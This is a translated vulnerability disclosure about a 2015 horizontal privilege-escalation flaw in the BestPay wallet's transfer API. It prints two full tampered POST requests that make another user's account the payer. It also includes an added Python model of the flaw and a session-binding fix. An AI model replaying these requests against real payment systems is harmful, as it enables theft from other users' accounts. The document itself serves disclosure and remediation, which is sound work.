
翼支付 (BestPay): flawed design in a transfer function (puts other users' account funds at risk)

2015-02-22 06:21

While logged in as user A and transferring to someone else, intercept A's transfer POST and rewrite it as shown so that it describes user B transferring 1.8 yuan to A (PRODUCTNO is the paying account, DESTPRODUCTNO the receiving one). The server accepts it and generates a transaction order number. Note that the encrypt, sessionkey and sig fields in the captured request are all empty.

Code area:

POST /MEPF_INF2/httppost?ran31=1420620640000?ran67=1420620697000 HTTP/1.1
Host: client.bestpay.com.cn
Connection: keep-alive
Content-Length: 380
Origin: file://
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; zh-cn; GT-I9100G Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, gb2312, gbk, *;q=0.7

method=predictTransfer&encrypt=&timestamp=000003&sessionkey=&v=000001&sig=&PRODUCTNO=<user B>&TRANSFERTYPE=8&SOURCEBANKCARDNO=&SOURCEACCOUNTNAME=&SOURCEIDTYPE=&SOURCEID=&DESTBANKCARDNO=&DESTACCOUNTNAME=&DESTIDTYPE=&DESTID=&DESTPRODUCTNO=<user A>&TXNAMOUNT=180%7C0&PARTNERID=000016900000&LOCATION=40&CUSTOMERNAME=&TXNPASSWD=&DESTCUSTOMERNAME=&TRANSREASON=&TXNAMOUNTFLAG=1%7C2



At the payment step, modify the POST again, this time adding user B's payment password. The transfer goes through: 1.8 yuan is taken from B's account without ever logging in as user B.

Code area:

POST /MEPF_INF2/httppost?ran31=1420620640000?ran67=1420620697000?ran93=1420620754000 HTTP/1.1
Host: client.bestpay.com.cn
Connection: keep-alive
Content-Length: 454
Origin: file://
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; zh-cn; GT-I9100G Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, gb2312, gbk, *;q=0.7

method=transfer&encrypt=&timestamp=000004&sessionkey=&v=000001&sig=&PRODUCTNO=<user B>&TXNPASSWD=<user B's payment password>&TRANSFERTYPE=8&SOURCEBANKCARDNO=&SOURCEACCOUNTNAME=&SOURCEIDTYPE=&SOURCEID=&DESTBANKCARDNO=&DESTACCOUNTNAME=&DESTIDTYPE=&DESTID=&DESTPRODUCTNO=<user A>&TXNAMOUNT=180%7C0&PARTNERID=000016900000&PARTNERORDERID=2015010793993881&ORDERID=150107068465925&LOCATION=40&CUSTOMERNAME=&DESTCUSTOMERNAME=&TRANSREASON=%E6%97%A0&TXNAMOUNTFLAG=1%7C2

Proof of vulnerability:

[Screenshot: Screenshot_2015-01-07-17-03-34.png]

Only the transfer function was tested; several other places have the same horizontal privilege escalation (one user acting on another user's account).

Fix suggestion:

Restrict it, and go beat Alipay. A small gift would be nice too.
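The two-step flow above (predictTransfer creates an order, transfer confirms it with a payment password) and the server-side fix it needs, as an added model in Python. This is not BestPay's code and reconstructs nothing about their back end: the Bank class, the account names USER_A and USER_B, the balances, passwords and order IDs are all constructed, and reading the part of TXNAMOUNT before the '|' as an amount in fen is an assumption based on 180|0 corresponding to 1.8 yuan. With strict=False the model trusts PRODUCTNO from the request body, which is the behaviour the report describes; with strict=True both calls are bound to the authenticated session and the same tampered requests are rejected, while B's own transfer still works.

```python
"""Model of a two-step wallet transfer API (predictTransfer, then transfer)
in the shape of the requests on the page.  Added example, not BestPay's code;
accounts, balances, passwords and order IDs are constructed."""
import hmac
from urllib.parse import parse_qs


class TransferError(Exception):
    pass


class Bank:
    def __init__(self, accounts, strict):
        # accounts: {account_no: {"balance": fen, "txn_passwd": str}}
        self.accounts = {k: dict(v) for k, v in accounts.items()}
        self.orders = {}       # ORDERID -> {"payer", "payee", "amount"}
        self.next_order = 1
        # strict=False: trust PRODUCTNO from the body (the reported behaviour)
        # strict=True:  bind payer and order to the authenticated session
        self.strict = strict

    @staticmethod
    def parse_body(body):
        """Flatten an application/x-www-form-urlencoded body to {field: value}."""
        return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

    @staticmethod
    def amount_fen(txnamount):
        # Assumption: "180|0" on the page is 1.8 yuan, so the part before '|'
        # is read as an amount in fen.
        return int(txnamount.split("|", 1)[0])

    def predict_transfer(self, session_user, body):
        """Step 1: create a pending order and return its ORDERID."""
        p = self.parse_body(body)
        payer, payee = p["PRODUCTNO"], p["DESTPRODUCTNO"]
        if self.strict and payer != session_user:
            raise TransferError("PRODUCTNO must be the logged-in account")
        if payer not in self.accounts or payee not in self.accounts:
            raise TransferError("unknown account")
        order_id = f"{self.next_order:015d}"
        self.next_order += 1
        self.orders[order_id] = {"payer": payer, "payee": payee,
                                 "amount": self.amount_fen(p["TXNAMOUNT"])}
        return order_id

    def transfer(self, session_user, body):
        """Step 2: confirm the order with the payer's payment password."""
        p = self.parse_body(body)
        order = self.orders.get(p.get("ORDERID", ""))
        if order is None:
            raise TransferError("unknown ORDERID")
        payer = order["payer"]
        if self.strict and (payer != session_user or p.get("PRODUCTNO") != session_user):
            raise TransferError("order does not belong to the logged-in account")
        # In the reported behaviour this password check is the only control,
        # and it protects nothing once the payer field is attacker-chosen.
        if not hmac.compare_digest(p.get("TXNPASSWD", ""), self.accounts[payer]["txn_passwd"]):
            raise TransferError("wrong payment password")
        amount = order["amount"]
        if self.accounts[payer]["balance"] < amount:
            raise TransferError("insufficient balance")
        self.accounts[payer]["balance"] -= amount
        self.accounts[order["payee"]]["balance"] += amount
        del self.orders[p["ORDERID"]]
        return amount


def run(strict, session_user, payer, payee, txn_passwd):
    """Submit the page's two requests with the given field values.

    Returns (outcome, balance of USER_A, balance of USER_B) in fen."""
    bank = Bank({"USER_A": {"balance": 0, "txn_passwd": "111111"},
                 "USER_B": {"balance": 1000, "txn_passwd": "222222"}}, strict)
    step1 = (f"method=predictTransfer&PRODUCTNO={payer}&TRANSFERTYPE=8"
             f"&DESTPRODUCTNO={payee}&TXNAMOUNT=180%7C0&TXNAMOUNTFLAG=1%7C2")
    try:
        order_id = bank.predict_transfer(session_user, step1)
        step2 = (f"method=transfer&PRODUCTNO={payer}&TXNPASSWD={txn_passwd}"
                 f"&TRANSFERTYPE=8&DESTPRODUCTNO={payee}&TXNAMOUNT=180%7C0"
                 f"&ORDERID={order_id}&TXNAMOUNTFLAG=1%7C2")
        bank.transfer(session_user, step2)
        outcome = "transferred"
    except TransferError as e:
        outcome = f"rejected: {e}"
    return outcome, bank.accounts["USER_A"]["balance"], bank.accounts["USER_B"]["balance"]


def attack(strict):
    """The report's scenario: logged in as USER_A, the body names USER_B as
    payer and carries USER_B's payment password."""
    return run(strict, "USER_A", "USER_B", "USER_A", "222222")


def legitimate(strict):
    """USER_B paying USER_A from USER_B's own session (must keep working)."""
    return run(strict, "USER_B", "USER_B", "USER_A", "222222")


if __name__ == "__main__":
    print("reported behaviour:  ", attack(strict=False))
    print("hardened:            ", attack(strict=True))
    print("legitimate, hardened:", legitimate(strict=True))
```

The hardened path makes two checks, not one: the payer named in predictTransfer must be the session's own account, and the order confirmed in transfer must have been created by that same session. Checking only at the second step would still let an attacker confirm an order they could never have created legitimately, so the identity binding belongs at both ends of the flow.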

Source: www.wooyun.org/bugs/wooyun-2015-090521
